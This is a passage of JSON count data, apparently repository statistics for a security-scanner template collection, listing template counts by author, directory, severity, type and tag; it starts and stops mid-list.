,{"name":"akincibor","count":55},{"name":"for3stco1d","count":49},{"name":"gaurang","count":42},{"name":"philippedelteil","count":37},{"name":"edoardottt","count":36},{"name":"c-sh0","count":32},{"name":"adam crosser","count":31},{"name":"theamanrawat","count":31},{"name":"righettod","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"random-robbie","count":13},{"name":"tenbird","count":13},{"name":"sharath","count":13},{"name":"johnk3r","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"dogasantos","count":11},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"ricardomaia","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"oppsec","count":9},{"name":"zh","count":8},{"name":"veshraj","count":8},{"name":"aashiq","count":8},{"name":"lu4nx","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"caspergn","count":7},{"name":"divya_mudgal","count":7},{"name":"leovalcante","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"amit-jd","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"iamnoooob","count":6},{"name":"rootxharsh","count":6},{"name":"gitlab red team","count":6},{"name":"evan rubinstein","count":6},{"name":"__fazal","count":6},{"name":"pentest_swissky","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"_0xf4n9x_","count":6},{"name":"forgedhallpass","count":6},{"name":"pathtaga","count":6},{"name":"imnightmaree","count":6},{"name":"nullfuzz","count":6},{"name":"puzzlepeaches","count":6},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"nodauf","count":5},{"name":"clem9669","count":5},{"name":"its0x08","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":5},{"name":"prajiteshsingh","count":5},{"name":"dadevel","count":4},{"name":"r3naissance","count":4},{"name":"hardik-solanki","count":4},{"name":"h1ei1","count":4},{"name":"tanq16","count":4},{"name":"0xlittleboy","count":4},{"name":"scent2d","count":4},{"name":"incogbyte","count":4},{"name":"dolev farhi","count":4},{"name":"robotshell","count":4},{"name":"powerexploit","count":4},{"name":"shine","count":4},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"e_schultze_","count":4},{"name":"3th1c_yuk1","count":4},{"name":"lucasljm2001","count":3},{"name":"whoever","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":3},{"name":"jarijaas","count":3},{"name":"fxploit","count":3},{"name":"arcc","count":3},{"name":"lark-lab","count":3},{"name":"dr0pd34d","count":3},{"name":"ekrause","count":3},{"name":"andydoering","count":3},{"name":"0w4ys","count":3},{"name":"unstabl3","count":3},{"name":"davidmckennirey","count":3},{"name":"kh4sh3i","count":3},{"name":"ph33r","count":3},{"name":"atomiczsec","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"skeltavik","count":3},{"name":"swissky","count":3},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"ambassify","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"supras","count":3},{"name":"me9187","count":3},{"name":"splint3r7","count":3},{"name":"f1tz","count":3},{"name":"hahwul","count":3},{"name":"emenalf","count":3},{"name":"johnjhacking","count":3},{"name":"dudez","count":3},{"name":"mr-xn","count":3},{"name":"impramodsargar","count":3},{"name":"nvn1729","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"r12w4n","count":2},{"name":"0xcrypto","count":2},{"name":"dahse89","count":2},{"name":"joeldeleep","count":2},{"name":"ree4pwn","count":2},{"name":"koti2","count":2},{"name":"bananabr","count":2},{"name":"socketz","count":2},{"name":"smaranchand","count":2},{"name":"zomsop82","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"d4vy","count":2},{"name":"dbrwsky","count":2},{"name":"vsh00t","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"ajaysenr","count":2},{"name":"danielmofer","count":2},{"name":"amsda","count":2},{"name":"notnotnotveg","count":2},{"name":"y4er","count":2},{"name":"gevakun","count":2},{"name":"z0ne","count":2},{"name":"foulenzer","count":2},{"name":"ehsahil","count":2},{"name":"afaq","count":2},{"name":"666asd","count":2},{"name":"g4l1t0","count":2},{"name":"0xsapra","count":2},{"name":"codexlynx","count":2},{"name":"joshlarsen","count":2},{"name":"udit_thakkur","count":2},{"name":"gal nagli","count":2},{"name":"v0idc0de","count":2},{"name":"thardt-praetorian","count":2},{"name":"badboycxcc","count":2},{"name":"x1m_martijn","count":2},{"name":"redteambrasil","count":2},{"name":"moritz nentwig","count":2},{"name":"cocxanh","count":2},{"name":"clarkvoss","count":2},{"name":"kiblyn11","count":2},{"name":"bsysop","count":2},{"name":"korteke","count":2},{"name":"0xprial","count":2},{"name":"paradessia","count":2},{"name":"paperpen","count":2},{"name":"n-thumann","count":2},{"name":"dheerajmadhukar","count":2},{"name":"raesene","count":2},{"name":"evergreencartoons","count":2},{"name":"hackerarpan","count":2},{"name":"pxmme1337","count":2},{"name":"taielab","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bernardofsr","count":2},{"name":"thezakman","count":2},{"name":"k11h-de","count":2},{"name":"canberbamber","count":2},{"name":"true13","count":2},{"name":"sy3omda","count":2},{"name":"randomrobbie","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"myztique","count":2},{"name":"0xnirvana","count":2},{"name":"uomogrande","count":2},{"name":"geekby","count":2},{"name":"brenocss","count":2},{"name":"rafaelwdornelas","count":2},{"name":"vavkamil","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"martincodes-de","count":2},{"name":"s0obi","count":2},{"name":"nuk3s3c","count":2},{"name":"sbani","count":2},{"name":"0xrudra","count":2},{"name":"manas_harsh","count":2},{"name":"w4cky_","count":2},{"name":"cckuakilong","count":2},{"name":"fabaff","count":2},{"name":"wa1tf0rme","count":2},{"name":"mohammedsaneem","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"kre80r","count":2},{"name":"8arthur","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"github.com/its0x08","count":2},{"name":"kishore-hariram","count":2},{"name":"convisoappsec","count":2},{"name":"luci","count":2},{"name":"rodnt","count":1},{"name":"remonsec","count":1},{"name":"manuelbua","count":1},{"name":"ahmetpergamum","count":1},{"name":"shivampand3y","count":1},{"name":"elitebaz","count":1},{"name":"xshuden","count":1},{"name":"0xceba","count":1},{"name":"erethon","count":1},{"name":"furkansenan","count":1},{"name":"bartu utku sarp","count":1},{"name":"queencitycyber","count":1},{"name":"lingtren","count":1},{"name":"mantissts","count":1},{"name":"s1r1u5_","count":1},{"name":"coldfish","count":1},{"name":"ooooooo_q","count":1},{"name":"chron0x","count":1},{"name":"pascalheidmann","count":1},{"name":"manasmbellani","count":1},{"name":"screamy","count":1},{"name":"_harleo","count":1},{"name":"droberson","count":1},{"name":"fq_hsu","count":1},{"name":"udyz","count":1},{"name":"becivells","count":1},{"name":"mrcl0wnlab","count":1},{"name":"dale clarke","count":1},{"name":"b0yd","count":1},{"name":"0xrod","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sickwell","count":1},{"name":"philippdelteil","count":1},{"name":"momen eldawakhly","count":1},{"name":"geraldino2","count":1},{"name":"stupidfish","count":1},{"name":"hexcat","count":1},{"name":"bjhulst","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"infosecsanyam","count":1},{"name":"marcos_iaf","count":1},{"name":"dk999","count":1},{"name":"theabhinavgaur","count":1},{"name":"kiransau","count":1},{"name":"miroslavsotak","count":1},{"name":"miryangjung","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"cookiehanhoan","count":1},{"name":"tirtha_mandal","count":1},{"name":"arjunchandarana","count":1},{"name":"hakluke","count":1},{"name":"luskabol","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ph33rr","count":1},{"name":"dievus","count":1},{"name":"jcockhren","count":1},{"name":"lixts","count":1},{"name":"hanlaomo","count":1},{"name":"jna1","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ofjaaah","count":1},{"name":"noraj","count":1},{"name":"wabafet","count":1},{"name":"adrianmf","count":1},{"name":"fopina","count":1},{"name":"jeya.seelan","count":1},{"name":"sshell","count":1},{"name":"shockwave","count":1},{"name":"evan rubinstien","count":1},{"name":"harshinsecurity","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"flag007","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sec_hawk","count":1},{"name":"florianmaak","count":1},{"name":"akash.c","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kaizensecurity","count":1},{"name":"tehtbl","count":1},{"name":"rotemreiss","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"nielsing","count":1},{"name":"y0no","count":1},{"name":"bughuntersurya","count":1},{"name":"pjborah","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"spac3wh1te","count":1},{"name":"rojanrijal","count":1},{"name":"paper-pen","count":1},{"name":"1nf1n7y","count":1},{"name":"shelld3v","count":1},{"name":"ling","count":1},{"name":"opencirt","count":1},{"name":"p-l-","count":1},{"name":"retr0","count":1},{"name":"micha3lb3n","count":1},{"name":"imhunterand","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"pdp","count":1},{"name":"couskito","count":1},{"name":"exceed","count":1},{"name":"narluin","count":1},{"name":"compr00t","count":1},{"name":"b0rn2r00t","count":1},{"name":"schniggie","count":1},{"name":"yashgoti","count":1},{"name":"b4uh0lz","count":1},{"name":"elder tao","count":1},{"name":"charanrayudu","count":1},{"name":"tea","count":1},{"name":"sak1","count":1},{"name":"ramkrishna sawant","count":1},{"name":"francescocarlucci","count":1},{"name":"kabirsuda","count":1},{"name":"ilovebinbash","count":1},{"name":"akshansh","count":1},{"name":"igibanez","count":1},{"name":"duty_1g","count":1},{"name":"secthebit","count":1},{"name":"soyelmago","count":1},{"name":"_c0wb0y_","count":1},{"name":"wlayzz","count":1},{"name":"whynotke","count":1},{"name":"anon-artist","count":1},{"name":"httpvoid","count":1},{"name":"unkl4b","count":1},{"name":"ldionmarcil","count":1},{"name":"0xtavian","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"mhdsamx","count":1},{"name":"phyr3wall","count":1},{"name":"aaronchen0","count":1},{"name":"rschio","count":1},{"name":"aringo","count":1},{"name":"co0nan","count":1},{"name":"x6263","count":1},{"name":"yavolo","count":1},{"name":"furkansayim","count":1},{"name":"iphantasmic","count":1},{"name":"absshax","count":1},{"name":"noamrathaus","count":1},{"name":"natto97","count":1},{"name":"lethargynavigator","count":1},{"name":"j33n1k4","count":1},{"name":"shreyapohekar","count":1},{"name":"0xceeb","count":1},{"name":"jaimin gondaliya","count":1},{"name":"exid","count":1},{"name":"zandros0","count":1},{"name":"alex","count":1},{"name":"petruknisme","count":1},{"name":"jbaines-r7","count":1},{"name":"noobexploiter","count":1},{"name":"alevsk","count":1},{"name":"liquidsec","count":1},{"name":"open-sec","count":1},{"name":"majidmc2","count":1},{"name":"iampritam","count":1},{"name":"ahmed abou-ela","count":1},{"name":"ohlinge","count":1},{"name":"xstp","count":1},{"name":"streetofhackerr007","count":1},{"name":"caon","count":1},{"name":"patralos","count":1},{"name":"kurohost","count":1},{"name":"calumjelrick","count":1},{"name":"8authur","count":1},{"name":"un-fmunozs","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"gboddin","count":1},{"name":"xeldax","count":1},{"name":"andirrahmani1","count":1},{"name":"0xteles","count":1},{"name":"izn0u","count":1},{"name":"thelicato","count":1},{"name":"nobody","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"rubina119","count":1},{"name":"ola456","count":1},{"name":"nerrorsec","count":1},{"name":"official_blackhat13","count":1},{"name":"arall","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"jbertman","count":1},{"name":"udinchan","count":1},{"name":"jaskaran","count":1},{"name":"lark lab","count":1},{"name":"af001","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"_darrenmartyn","count":1},{"name":"blckraven","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"lrtk-coder","count":1},{"name":"omarkurt","count":1},{"name":"megamansec","count":1},{"name":"sinkettu","count":1},{"name":"dawid-czarnecki","count":1},{"name":"kr1shna4garwal","count":1},{"name":"lamscun","count":1},{"name":"justmumu","count":1},{"name":"hardik-rathod","count":1},{"name":"elmahdi","count":1},{"name":"f1she3","count":1},{"name":"piyushchhiroliya","count":1},{"name":"skylark-lab","count":1},{"name":"danigoland","count":1},{"name":"affix","count":1},{"name":"rivalsec","count":1},{"name":"thevillagehacker","count":1},{"name":"ahmed sherif","count":1},{"name":"thebinitghimire","count":1},{"name":"tim_koopmans","count":1},{"name":"alperenkesk","count":1},{"name":"alexrydzak","count":1},{"name":"jiheon-dev","count":1},{"name":"rotembar","count":1},{"name":"nagli","count":1},{"name":"arm!tage","count":1},{"name":"nytr0gen","count":1},{"name":"0xh7ml","count":1},{"name":"mass0ma","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0h1in9e","count":1},{"name":"aresx","count":1},{"name":"evolutionsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"notsoevilweasel","count":1},{"name":"retr02332","count":1},{"name":"viondexd","count":1},{"name":"luqmaan hadia","count":1},{"name":"pudsec","count":1},{"name":"c3l3si4n","count":1},{"name":"brabbit10","count":1},{"name":"5up3r541y4n","count":1},{"name":"jteles","count":1},{"name":"mubassirpatel","count":1},{"name":"kareemse1im","count":1},{"name":"regala_","count":1},{"name":"exploitation","count":1},{"name":"jeya seelan","count":1},{"name":"d0rkerdevil","count":1},{"name":"kailashbohara","count":1},{"name":"push4d","count":1},{"name":"sherlocksecurity","count":1},{"name":"prettyboyaaditya","count":1},{"name":"act1on3","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"osamahamad","count":1},{"name":"ggranjus","count":1},{"name":"apt-mirror","count":1},{"name":"shifacyclewla","count":1},{"name":"ipanda","count":1},{"name":"djoevanka","count":1},{"name":"mah3sec_","count":1},{"name":"th3.d1p4k","count":1},{"name":"orpheus","count":1},{"name":"juicypotato1","count":1},{"name":"breno_css","count":1},{"name":"borna nematzadeh","count":1},{"name":"daviey","count":1},{"name":"ptonewreckin","count":1},{"name":"vinit989","count":1},{"name":"willd96","count":1},{"name":"arr0way","count":1},{"name":"viniciuspereiras","count":1},{"name":"luqman","count":1},{"name":"oscarintherocks","count":1},{"name":"ok_bye_now","count":1},{"name":"carlosvieira","count":1},{"name":"failopen","count":1},{"name":"bywalks","count":1},{"name":"pratik khalane","count":1},{"name":"kiks7","count":1},{"name":"w0tx","count":1},{"name":"zhenwarx","count":1},{"name":"undefl0w","count":1},{"name":"elouhi","count":1},{"name":"dhiyaneshdki","count":1},{"name":"husain","count":1},{"name":"tirtha","count":1},{"name":"yashanand155","count":1},{"name":"vzamanillo","count":1},{"name":"davidfegyver","count":1},{"name":"pry0cc","count":1},{"name":"allenwest24","count":1},{"name":"revblock","count":1},{"name":"realexp3rt","count":1},{"name":"ransomsec","count":1},{"name":"zsusac","count":1},{"name":"shiar","count":1},{"name":"jas37","count":1},{"name":"yuansec","count":1},{"name":"intx0x80","count":1},{"name":"hakimkt","count":1},{"name":"zinminphy0","count":1},{"name":"fmunozs","count":1},{"name":"maximus decimus","count":1},{"name":"qlkwej","count":1},{"name":"mesaglio","count":1},{"name":"andysvints","count":1},{"name":"0xd0ff9","count":1},{"name":"h4kux","count":1},{"name":"makyotox","count":1},{"name":"amanrawat","count":1},{"name":"2rs3c","count":1},{"name":"jrolf","count":1},{"name":"aayush vishnoi","count":1},{"name":"deena","count":1},{"name":"toufik-airane","count":1},{"name":"clment cruchet","count":1},{"name":"amnotacat","count":1},{"name":"daffianfo","count":1}],"directory":[{"name":"cves","count":1528},{"name":"exposed-panels","count":780},{"name":"vulnerabilities","count":519},{"name":"misconfiguration","count":361},{"name":"technologies","count":319},{"name":"exposures","count":308},{"name":"token-spray","count":236},{"name":"workflows","count":190},{"name":"default-logins","count":116},{"name":"file","count":78},{"name":"takeovers","count":69},{"name":"network","count":63},{"name":"iot","count":41},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1666},{"name":"high","count":1152},{"name":"medium","count":835},{"name":"critical","count":552},{"name":"low","count":281},{"name":"unknown","count":25}],"types":[{"name":"http","count":4323},{"name":"file","count":78},{"name":"network","count":77},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1552},{"name":"panel","count":780},{"name":"edb","count":582},{"name":"exposure","count":551},{"name":"xss","count":543},{"name":"lfi","count":519},{"name":"wordpress","count":471},{"name":"cve2021","count":370},{"name":"wp-plugin","count":366},{"name":"tech","count":360},{"name":"rce","count":347},{"name":"packetstorm","count":292},{"name":"cve2022","count":266},{"name":"wpscan","count":256},{"name":"token-spray","count":236},{"name":"misconfig","count":228},{"name":"cve2020","count":224},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":188},{"name":"kev","count":168},{"name":"config","count":167},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":133},{"name":"apache","count":127},{"name":"oast","count":127},{"name":"iot","count":125},{"name":"authenticated","count":121},{"name":"sqli","count":118},{"name":"cve2010","count":111},{"name":"files","count":92},{"name":"router","count":92},{"name":"redirect","count":90},{"name":"login","count":89},{"name":"network","count":81},{"name":"takeover","count":75},{"name":"devops","count":75},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":71},{"name":"cms","count":67},{"name":"auth-bypass","count":66},{"name":"file","count":65},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"install","count":59},{"name":"disclosure","count":57},{"name":"seclists","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"cve2015","count":47},{"name":"fileupload","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"hackerone","count":39},{"name":"vmware","count":38},{"name":"vulhub","count":38},{"name":"logs","count":38},{"name":"atlassian","count":38},{"name":"debug","count":37},{"name":"tenable","count":36},{"name":"springboot","count":35},{"name":"traversal","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"huntr","count":31},{"name":"listing","count":31},{"name":"kubernetes","count":30},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"cnvd","count":25},{"name":"sap","count":25},{"name":"microsoft","count":25},{"name":"misc","count":23},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"aws","count":23},{"name":"fuzz","count":22},{"name":"php","count":22},{"name":"api","count":21},{"name":"zoho","count":21},{"name":"manageengine","count":21},{"name":"cve2012","count":21},{"name":"wp-theme","count":21},{"name":"cloud","count":20},{"name":"weblogic","count":20},{"name":"tomcat","count":19},{"name":"k8s","count":19},{"name":"camera","count":19},{"name":"ibm","count":19},{"name":"cicd","count":19},{"name":"deserialization","count":19},{"name":"gitlab","count":18},{"name":"dlink","count":18},{"name":"firewall","count":17},{"name":"service","count":17},{"name":"jenkins","count":17},{"name":"wavlink","count":17},{"name":"struts","count":17},{"name":"ftp","count":16},{"name":"printer","count":16},{"name":"nginx","count":15},{"name":"xxe","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"fortinet","count":15},{"name":"java","count":14},{"name":"domainmod","count":14},{"name":"hp","count":14},{"name":"android","count":14},{"name":"confluence","count":13},{"name":"woocommerce","count":13},{"name":"cve2008","count":13},{"name":"status","count":13},{"name":"msf","count":13},{"name":"amazon","count":13},{"name":"abstractapi","count":13},{"name":"cve2013","count":13},{"name":"lfr","count":13},{"name":"magento","count":13},{"name":"drupal","count":12},{"name":"microweber","count":12},{"name":"github","count":12},{"name":"netgear","count":12},{"name":"rails","count":12},{"name":"fortigate","count":12},{"name":"vpn","count":12},{"name":"backup","count":12},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"webserver","count":11},{"name":"zyxel","count":11},{"name":"azure","count":11},{"name":"ssl","count":11},{"name":"cnvd2021","count":11},{"name":"backdoor","count":11},{"name":"mail","count":11},{"name":"cisa","count":11},{"name":"airflow","count":11},{"name":"laravel","count":10},{"name":"django","count":10},{"name":"git","count":10},{"name":"dell","count":10},{"name":"grafana","count":10},{"name":"glpi","count":10},{"name":"ruby","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"coldfusion","count":10},{"name":"ssti","count":9},{"name":"fastjson","count":9},{"name":"kube","count":9},{"name":"phpmyadmin","count":9},{"name":"prometheus","count":9},{"name":"windows","count":9},{"name":"ssh","count":9},{"name":"zimbra","count":9},{"name":"versa","count":9},{"name":"vcenter","count":9},{"name":"sonicwall","count":9},{"name":"dedecms","count":9},{"name":"iis","count":9},{"name":"zabbix","count":9},{"name":"wso2","count":9},{"name":"symfony","count":8},{"name":"audit","count":8},{"name":"npm","count":8},{"name":"config-audit","count":8},{"name":"solarview","count":8},{"name":"jetbrains","count":8},{"name":"elasticsearch","count":8},{"name":"bucket","count":8},{"name":"recon","count":8},{"name":"kafka","count":8},{"name":"auth","count":8},{"name":"scada","count":8},{"name":"citrix","count":8},{"name":"metadata","count":8},{"name":"cisco-switch","count":8},{"name":"jboss","count":8},{"name":"headless","count":8},{"name":"mirai","count":8},{"name":"solr","count":8},{"name":"hms","count":8},{"name":"maps","count":7},{"name":"go","count":7},{"name":"firebase","count":7},{"name":"blind","count":7},{"name":"opencats","count":7},{"name":"ognl","count":7},{"name":"samsung","count":7},{"name":"seeyon","count":7},{"name":"detect","count":7},{"name":"nodejs","count":7},{"name":"python","count":7},{"name":"cnvd2020","count":7},{"name":"docker","count":7},{"name":"squirrelmail","count":7},{"name":"icewarp","count":7},{"name":"druid","count":7},{"name":"exchange","count":7},{"name":"microstrategy","count":6},{"name":"huawei","count":6},{"name":"cobbler","count":6},{"name":"websphere","count":6},{"name":"slack","count":6},{"name":"fpd","count":6},{"name":"liferay","count":6},{"name":"emerge","count":6},{"name":"vms","count":6},{"name":"admin","count":6},{"name":"setup","count":6},{"name":"enum","count":6},{"name":"smtp","count":6},{"name":"moodle","count":6},{"name":"kubelet","count":6},{"name":"jamf","count":6},{"name":"cache","count":6},{"name":"ofbiz","count":6},{"name":"crlf","count":6},{"name":"jetty","count":6},{"name":"activemq","count":6},{"name":"artica","count":6},{"name":"elfinder","count":6},{"name":"thinkphp","count":6},{"name":"node","count":6},{"name":"zhiyuan","count":6},{"name":"lucee","count":6},{"name":"opensis","count":6},{"name":"rconfig","count":6},{"name":"magmi","count":6},{"name":"openvpn","count":6},{"name":"bigip","count":6},{"name":"ecology","count":6},{"name":"sitecore","count":6},{"name":"bypass","count":6},{"name":"db","count":6},{"name":"elastic","count":5},{"name":"minio","count":5},{"name":"filemanager","count":5},{"name":"gogs","count":5},{"name":"keycloak","count":5},{"name":"gocd","count":5},{"name":"parallels","count":5},{"name":"nagios","count":5},{"name":"mongodb","count":5},{"name":"74cms","count":5},{"name":"firmware","count":5},{"name":"error","count":5},{"name":"solarwinds","count":5},{"name":"alibaba","count":5},{"name":"rseenet","count":5},{"name":"fortios","count":5},{"name":"apisix","count":5},{"name":"s3","count":5},{"name":"symantec","count":5},{"name":"carrental","count":5},{"name":"prestashop","count":5},{"name":"redis","count":5},{"name":"avideo","count":5},{"name":"scan","count":5},{"name":"plesk","count":5},{"name":"leak","count":5},{"name":"fatpipe","count":5},{"name":"metinfo","count":5},{"name":"circarlife","count":5},{"name":"rfi","count":5},{"name":"cockpit","count":5},{"name":"storage","count":5},{"name":"strapi","count":5},{"name":"database","count":5},{"name":"vbulletin","count":5},{"name":"awstats","count":5},{"name":"openemr","count":4},{"name":"sangfor","count":4},{"name":"redmine","count":4},{"name":"artifactory","count":4},{"name":"terramaster","count":4},{"name":"candidats","count":4},{"name":"httpserver","count":4},{"name":"hashicorp","count":4},{"name":"console","count":4},{"name":"zte","count":4},{"name":"search","count":4},{"name":"telerik","count":4},{"name":"hpe","count":4},{"name":"phppgadmin","count":4},{"name":"hoteldruid","count":4},{"name":"beyondtrust","count":4},{"name":"sendgrid","count":4},{"name":"wcs","count":4},{"name":"puppet","count":4},{"name":"cve2007","count":4},{"name":"tikiwiki","count":4},{"name":"ampache","count":4},{"name":"kentico","count":4},{"name":"cnvd2019","count":4},{"name":"vrealize","count":4},{"name":"springcloud","count":4},{"name":"prtg","count":4},{"name":"nexus","count":4},{"name":"roxy","count":4},{"name":"stripe","count":4},{"name":"asp","count":4},{"name":"royalevent","count":4},{"name":"aspose","count":4},{"name":"sophos","count":4},{"name":"flink","count":4},{"name":"jellyfin","count":4},{"name":"cacti","count":4},{"name":"kevinlab","count":4},{"name":"bmc","count":4},{"name":"gnuboard","count":4},{"name":"linkerd","count":4},{"name":"telesquare","count":4},{"name":"panos","count":4},{"name":"voip","count":4},{"name":"oauth","count":4},{"name":"kibana","count":4},{"name":"tenda","count":4},{"name":"couchdb","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"ems","count":4},{"name":"hybris","count":4},{"name":"xmlrpc","count":4},{"name":"mailchimp","count":4},{"name":"gitea","count":4},{"name":"rabbitmq","count":4},{"name":"dropbear","count":4},{"name":"oa","count":4},{"name":"axigen","count":4},{"name":"horde","count":4},{"name":"paypal","count":4},{"name":"nosqli","count":4},{"name":"caucho","count":4},{"name":"sonarqube","count":4},{"name":"yeswiki","count":4},{"name":"postmessage","count":4},{"name":"phpinfo","count":4},{"name":"adminer","count":4},{"name":"hikvision","count":4},{"name":"resin","count":4},{"name":"photo","count":4},{"name":"ruckus","count":4},{"name":"umbraco","count":4},{"name":"sql","count":4},{"name":"typo3","count":4},{"name":"jeesns","count":3},{"name":"goanywhere","count":3},{"name":"splunk","count":3},{"name":"bitbucket","count":3},{"name":"fileman","count":3},{"name":"fuelcms","count":3},{"name":"kingsoft","count":3},{"name":"graylog","count":3},{"name":"ampps","count":3},{"name":"httpd","count":3},{"name":"movable","count":3},{"name":"eshop","count":3},{"name":"bigant","count":3},{"name":"pfsense","count":3},{"name":"subrion","count":3},{"name":"thruk","count":3},{"name":"axis","count":3},{"name":"codeigniter","count":3},{"name":"netlify","count":3},{"name":"flexvnf","count":3},{"name":"openstack","count":3},{"name":"wordfence","count":3},{"name":"redash","count":3},{"name":"axis2","count":3},{"name":"webadmin","count":3},{"name":"microfocus","count":3},{"name":"blockchain","count":3},{"name":"influxdb","count":3},{"name":"kkfileview","count":3},{"name":"panabit","count":3},{"name":"rlm","count":3},{"name":"drawio","count":3},{"name":"grav","count":3},{"name":"pip","count":3},{"name":"steve","count":3},{"name":"finecms","count":3},{"name":"sentry","count":3},{"name":"square","count":3},{"name":"superadmin","count":3},{"name":"mikrotik","count":3},{"name":"intercom","count":3},{"name":"pentaho","count":3},{"name":"mautic","count":3},{"name":"jfrog","count":3},{"name":"webmin","count":3},{"name":"smb","count":3},{"name":"consul","count":3},{"name":"ec2","count":3},{"name":"teamcity","count":3},{"name":"clusterengine","count":3},{"name":"rackn","count":3},{"name":"webmail","count":3},{"name":"openam","count":3},{"name":"sharepoint","count":3},{"name":"bitrix","count":3},{"name":"3cx","count":3},{"name":"globalprotect","count":3},{"name":"dreambox","count":3},{"name":"digitalocean","count":3},{"name":"yonyou","count":3},{"name":"odoo","count":3},{"name":"elementor","count":3},{"name":"epson","count":3},{"name":"linksys","count":3},{"name":"labkey","count":3},{"name":"digitalrebar","count":3},{"name":"dotcms","count":3},{"name":"seagate","count":3},{"name":"pega","count":3},{"name":"dom","count":3},{"name":"selenium","count":3},{"name":"netdata","count":3},{"name":"samba","count":3},{"name":"weiphp","count":3},{"name":"mongo","count":3},{"name":"metabase","count":3},{"name":"cloudflare","count":3},{"name":"concrete","count":3},{"name":"selea","count":3},{"name":"zend","count":3},{"name":"thinfinity","count":3},{"name":"aptus","count":3},{"name":"lansweeper","count":3},{"name":"telnet","count":3},{"name":"centos","count":3},{"name":"lotus","count":3},{"name":"unifi","count":3},{"name":"trendnet","count":3},{"name":"getsimple","count":3},{"name":"httpbin","count":3},{"name":"mcafee","count":3},{"name":"openfire","count":3},{"name":"cve2005","count":3},{"name":"ivanti","count":3},{"name":"zeroshell","count":3},{"name":"r-seenet","count":3},{"name":"jupyter","count":3},{"name":"targa","count":3},{"name":"ansible","count":3},{"name":"proftpd","count":3},{"name":"geoserver","count":3},{"name":"bruteforce","count":3},{"name":"matrix","count":3},{"name":"fanruan","count":3},{"name":"